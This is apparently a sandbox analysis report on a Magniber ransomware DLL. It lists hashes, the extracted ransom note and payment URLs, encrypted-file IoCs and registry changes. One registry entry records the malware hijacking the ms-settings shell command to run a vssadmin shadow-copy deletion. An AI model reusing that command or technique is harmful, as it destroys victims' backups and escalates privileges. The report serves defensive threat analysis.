magniber | 5ce6fca6bd23161542ac33294ea2135c9278acee6a13c69028f81ca71beecebe

Analysis

max time kernel
146s
max time network
122s
platform
windows10_x64
resource
win10-en-20211014
submitted
04-11-2021 07:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c5f402a197a5b61d5b08d2602eb6d4a8.dll
Size

38KB
MD5

c5f402a197a5b61d5b08d2602eb6d4a8
SHA1

5e5203f0376a5f9665430ae6d9f2240f68b15e2c
SHA256

5ce6fca6bd23161542ac33294ea2135c9278acee6a13c69028f81ca71beecebe
SHA512

74e03a6db63ca2969bdc538a426be1da4680f2c3acfa5737d1f8602e6bfe088600bd6252911896106edc3e28ed1a6f4040a3a172952c1bcf144fd7b2efdfe0c6

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://54ac6090a47ca27032koxinsnc.d7h33stfpbhrhq7k4oybqe5nw2f3ne5iukuq5lyirwbkhi52pb6hzrad.onion/koxinsnc Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://54ac6090a47ca27032koxinsnc.bookrow.website/koxinsnc http://54ac6090a47ca27032koxinsnc.letsyou.uno/koxinsnc http://54ac6090a47ca27032koxinsnc.bankhid.space/koxinsnc http://54ac6090a47ca27032koxinsnc.twosat.fit/koxinsnc Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://54ac6090a47ca27032koxinsnc.d7h33stfpbhrhq7k4oybqe5nw2f3ne5iukuq5lyirwbkhi52pb6hzrad.onion/koxinsnc

http://54ac6090a47ca27032koxinsnc.bookrow.website/koxinsnc

http://54ac6090a47ca27032koxinsnc.letsyou.uno/koxinsnc

http://54ac6090a47ca27032koxinsnc.bankhid.space/koxinsnc

http://54ac6090a47ca27032koxinsnc.twosat.fit/koxinsnc

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2032	2100	cmd.exe	80
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2388	2100	cmd.exe	80
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2000	2100	vssadmin.exe	80

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 13 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\BackupExit.raw => C:\Users\Admin\Pictures\BackupExit.raw.koxinsnc	rundll32.exe
File renamed	C:\Users\Admin\Pictures\ConnectBlock.crw => C:\Users\Admin\Pictures\ConnectBlock.crw.koxinsnc	rundll32.exe
File renamed	C:\Users\Admin\Pictures\ConnectProtect.crw => C:\Users\Admin\Pictures\ConnectProtect.crw.koxinsnc	rundll32.exe
File renamed	C:\Users\Admin\Pictures\DenyCompare.crw => C:\Users\Admin\Pictures\DenyCompare.crw.koxinsnc	rundll32.exe
File renamed	C:\Users\Admin\Pictures\PublishImport.raw => C:\Users\Admin\Pictures\PublishImport.raw.koxinsnc	rundll32.exe
File opened for modification	C:\Users\Admin\Pictures\ConvertFromSet.tiff	rundll32.exe
File renamed	C:\Users\Admin\Pictures\ConvertFromSet.tiff => C:\Users\Admin\Pictures\ConvertFromSet.tiff.koxinsnc	rundll32.exe
File renamed	C:\Users\Admin\Pictures\SkipGroup.tif => C:\Users\Admin\Pictures\SkipGroup.tif.koxinsnc	rundll32.exe
File renamed	C:\Users\Admin\Pictures\GrantResume.crw => C:\Users\Admin\Pictures\GrantResume.crw.koxinsnc	rundll32.exe
File renamed	C:\Users\Admin\Pictures\PingDeny.png => C:\Users\Admin\Pictures\PingDeny.png.koxinsnc	rundll32.exe
File opened for modification	C:\Users\Admin\Pictures\SwitchConvertTo.tiff	rundll32.exe
File renamed	C:\Users\Admin\Pictures\SwitchConvertTo.tiff => C:\Users\Admin\Pictures\SwitchConvertTo.tiff.koxinsnc	rundll32.exe
File renamed	C:\Users\Admin\Pictures\UninstallConvert.tif => C:\Users\Admin\Pictures\UninstallConvert.tif.koxinsnc	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation	cmd.exe

Suspicious use of SetThreadContext 64 IoCs

description	pid	Process
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe
PID 2096 set thread context of 0	2096	rundll32.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
2000	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_EmieUserList\Cac = "1"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000d05983fb52d1e7fe4e37020b65a20b1a908b55b0054cf54aaf968d2bf7128edde38a905ccd5eee2ee12dff5d08dda0e4ef7a25c96b9e74560140dbcd0c363b5c57c08e98c5dd049a9b5141e97391585309ffbed8663150628f262c0acba264486a1beaa90eed7fbba3c255051d5e140d6c383ee47fa5b973466a6ca1f1f7eaf3f0ba26e1f32d2ed7eaa05cc505e48377b4464bc6a79a04d8a72a32083ed6dae2b9bf90fbd53f89bf890b71f5dbc2568bcf49c6ae8ab00eb26588cec685dd83b4b74904866ec2a1a5cd23fa1db39a673c0562d6ecb1871f92f3a259a918ae99887978ed92a95567fc4009ae5ff80b8e6ecdaf390e1fc09922669ab6bf91e74201106c93bc939adf6b0adb895ad1b5b97ea4519f487df9b6e0c18e13308e29cdd1f6446b7c5230b2d075ba3c9bee38fe56716930391cd362e817a0f7d60215ffdc9f2243ccdeb6d95469c61e5f1434d2140715fcedc3ee21cd8cee11b3ba4958e24e25ed1ec4ce1e8a6f1f83332649e542c9769243daeaa087f49a202f4367c9be436d27a04617aca349e52b583817979bf6ac5e95e967d76c5d81a54efc7f36409c7eaae8e854	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_EmieSiteList\Cac = "256"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "o2jknei"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_Emi = "MicrosoftEdge\\User\\Default\\EmieSiteList"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\ChildCapabilities\006 = 53002d0031002d00310035002d0033002d003100000053002d0031002d00310035002d0033002d003900000053002d0031002d00310035002d0033002d0033003200310035003400330030003800380034002d0031003300330039003800310036003200390032002d00380039003200350037003600310036002d003100310034003500380033003100300031003900000053002d0031002d00310035002d0033002d003700380037003400340038003200350034002d0031003200300037003900370032003800350038002d0033003500350038003600330033003600320032002d003100300035003900380038003600390036003400000053002d0031002d00310035002d0033002d0033003800340035003200370033003400360033002d0031003300330031003400320037003700300032002d0031003100380036003500350031003100390035002d003100310034003800310030003900390037003700000053002d0031002d00310035002d0033002d0031003000320034002d0031003000360035003300360035003900330036002d0031003200380031003600300034003700310036002d0033003500310031003700330038003400320038002d0031003600350034003700320031003600380037002d003400330032003700330034003400370039002d0033003200330032003100330035003800300036002d0034003000350033003200360034003100320032002d003300340035003600390033003400360038003100000053002d0031002d00310035002d0033002d0031003000320034002d0033003600320033003800350035003000340031002d0031003800320036003900390039003900350036002d0033003700340037003000360039003800310038002d0033003500320035003200360030003200320033002d0033003700340037003300370034003500310030002d0031003700340036003200370032003600320034002d003900350030003600300031003100360038002d0035003600350035003600330033003100000053002d0031002d00310035002d0033002d0031003000320034002d0032003400300035003400340033003400380039002d003800370034003000330036003100320032002d0034003200380036003000330035003500350035002d0031003800320033003900320031003500360035002d0031003700340036003500340037003400330031002d0032003400350033003800380035003400340038002d0033003600320035003900350032003900300032002d00390039003100360033003100320035003600000053002d0031002d00310035002d0033002d0031003000320034002d0031003500300032003800320035003100360036002d0031003900360033003700300038003300340035002d0032003600310036003300370037003400360031002d0032003500360032003800390037003000370034002d0034003100390032003000320038003300370032002d0033003900360038003300300031003500370030002d0031003900390037003600320038003600390032002d003100340033003500390035003300360032003200000053002d0031002d00310035002d0033002d0031003000320034002d0033003200300033003300350031003400320039002d0032003100320030003400340033003700380034002d0032003800370032003600370030003700390037002d0031003900310038003900350038003300300032002d0032003800320039003000350035003600340037002d0034003200370035003700390034003500310039002d003700360035003600360034003400310034002d003200370035003100370037003300330033003400000053002d0031002d00310035002d0033002d0031003000320034002d0031003700380038003100320039003300300033002d0032003100380033003200300038003500370037002d0033003900390039003400370034003200370032002d0033003100340037003300350039003900380035002d0031003700350037003300320032003100390033002d0033003800310035003700350036003300380036002d003100350031003500380032003100380030002d003100380038003800310030003100310039003300000053002d0031002d00310035002d0033002d0031003000320034002d0033003100350033003500300039003600310033002d003900360030003600360036003700360037002d0033003700320034003600310031003100330035002d0032003700320035003600360032003600340030002d00310032003100330038003200350033002d003500340033003900310030003200320037002d0031003900350030003400310034003600330035002d003400310039003000320039003000310038003700000053002d0031002d00310035002d0033002d0031003000320034002d003100320036003000370038003500390033002d0033003600350038003600380036003700320038002d0031003900380034003800380033003300300036002d003800320031003300390039003600390036002d0033003600380034003000370039003900360030002d003500360034003000330038003600380030002d0033003400310034003800380030003000390038002d003300340033003500380032003500320030003100000053002d0031002d00310035002d0033002d0031003000320034002d0031003600390032003900370030003100350035002d0034003000350034003800390033003300330035002d003100380035003700310034003000390031002d0033003300360032003600300031003900340033002d0033003500320036003500390033003100380031002d0031003100350039003800310036003900380034002d0032003100390039003000300038003500380031002d00340039003700340039003200390039003100000053002d0031002d00310035002d0033002d0031003000320034002d003200320030003000320032003700370030002d003700300031003200360031003900380034002d0033003900390031003200390032003900350036002d0034003200300038003700350031003000320030002d0032003900310038003200390033003000350038002d0033003300390036003400310039003300330031002d0031003700300030003900330032003300340038002d003200300037003800330036003400380039003100000053002d0031002d00310035002d0033002d0031003000320034002d003500320038003100310038003900360036002d0033003800370036003800370034003300390038002d003700300039003500310033003500370031002d0031003900300037003800370033003000380034002d0033003500390038003200320037003600330034002d0033003600390038003700330030003000360030002d003200370038003000370037003700380038002d003300390039003000360030003000320030003500000053002d0031002d00310035002d0033002d0031003000320034002d0031003800360034003100310031003700350034002d003700370036003200370033003300310037002d0033003600360036003900320035003000320037002d0032003500320033003900300038003000380031002d0033003700390032003400350038003200300036002d0033003500380032003400370032003400330037002d0034003100310034003400310039003900370037002d003100350038003200380038003400380035003700000053002d0031002d00310035002d0033002d0031003000320034002d0034003000340034003800330035003100330039002d0032003600350038003400380032003000340031002d0033003100320037003900370033003100360034002d003300320039003200380037003200330031002d0033003800360035003800380030003800360031002d0031003900330038003600380035003600340033002d003400360031003000360037003600350038002d003100300038003700300030003000340032003200000053002d0031002d00310035002d0033002d0031003000320034002d0032003900320032003200390036003200360031002d0031003600340037003400380032003700360038002d0032003000310037003000390031003100340036002d0033003800350038003600360037003000360038002d0034003100330035003600360033003600360032002d0032003900330031003900380035003800390034002d0031003600320037003800320030003900320035002d00380031003800330036003600340033003100000053002d0031002d00310035002d0033002d0031003000320034002d0032003400340030003300300036003300370037002d0033003300300034003600310031003000340039002d0031003400390034003300390039003000370031002d0031003100360031003900320036003200320033002d003100360033003900310032003300380034002d0031003400330037003000360035003700370033002d0031003400350036003800320030003500360030002d00320033003900300031003500380031003900360000000000	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 25b0743d06c1d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "262144"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_DNTException\Cac = "1"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000c0a4dcbd82b093502259d75a15fb012f804111eb36eae5981f7c50066d2287c2891bf004296c3e0b52c6a7b789e5ea8a8817d9227af885a0ef5e7e6d	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 25b0743d06c1d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iec = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\IECompatUaCache"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompatua\Cache = "MicrosoftEdge_iecompatua:"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\iedownload\CacheRepair = "0"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_Emi = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\iedownload	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_EmieSiteList\Cac = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\EmieSiteList"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompat\CacheRe = "0"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_EmieUserList\Cac = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\EmieUserList"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iec	Process not Found
